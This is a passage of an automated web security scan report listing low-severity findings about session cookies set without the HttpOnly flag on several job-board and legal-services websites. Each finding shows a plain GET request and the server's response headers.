Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.77. http://www.intellectualpropertycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.78. http://www.internshipcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.79. http://www.j2eecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.80. http://www.journalismcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.81. http://www.lawcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...

10.82. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /article/6070/Brooklyn-Law-School/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

10.83. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /article/6154/Anne-Healy-LIDS/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

10.84. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

10.85. http://www.lawcrossing.com/lcjssearchresults.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

10.86. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

10.87. http://www.lawfirmstaff.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawfirmstaff.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=egea78a3rqgqf8pr582hmugbv0; path=/; domain=www.lawfirmstaff.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27468

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Law Firm Placement, Legal Staff, Law Firm Jobs, Legal Placement - Law Firm S
...[SNIP]...

10.88. http://www.lawschoolloanreport.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawschoolloanreport.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawschoolloanreport.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=nivvn9c4qv4ger2d748thpv5d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10640


<html>
<head>
    <TITLE>Student Loan Report, Student Aid Report, Student Financial Aid Report, Federal Student Aid Report . Law School Loan Report</TITLE>
   <meta name="Description" content="Law School
...[SNIP]...

10.89. http://www.lawschoolloans.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lawschoolloans.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...

10.90. https://www.lawschoolloans.com/lslprivateloan_application.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.lawschoolloans.com
Path:   /lslprivateloan_application.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29907

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...

10.91. http://www.legalauthority.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130129

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...

10.92. http://www.legalauthority.com/signup.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

10.93. http://www.legalauthority.com/tmlandingpage.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /tmlandingpage.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tmlandingpage.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 21 Jan 2011 23:39:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p1af1u3t2cg87k68135k4t85s4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.legalauthority.com/signup.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1


10.94. http://www.legalauthority.com/tmviewbanner.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /tmviewbanner.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tmviewbanner.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=l84i6u5b77fejg78f776j97925; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1


10.95. http://www.legalauthorityfinancial.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legalauthorityfinancial.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.legalauthorityfinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qehl4db4i9jtun1bl38idujof7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Length: 7593
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Authority Financial Services</title>
   <meta name="google-site-verifi
...[SNIP]...

10.96. http://www.logisticscrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.97. http://www.managercrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
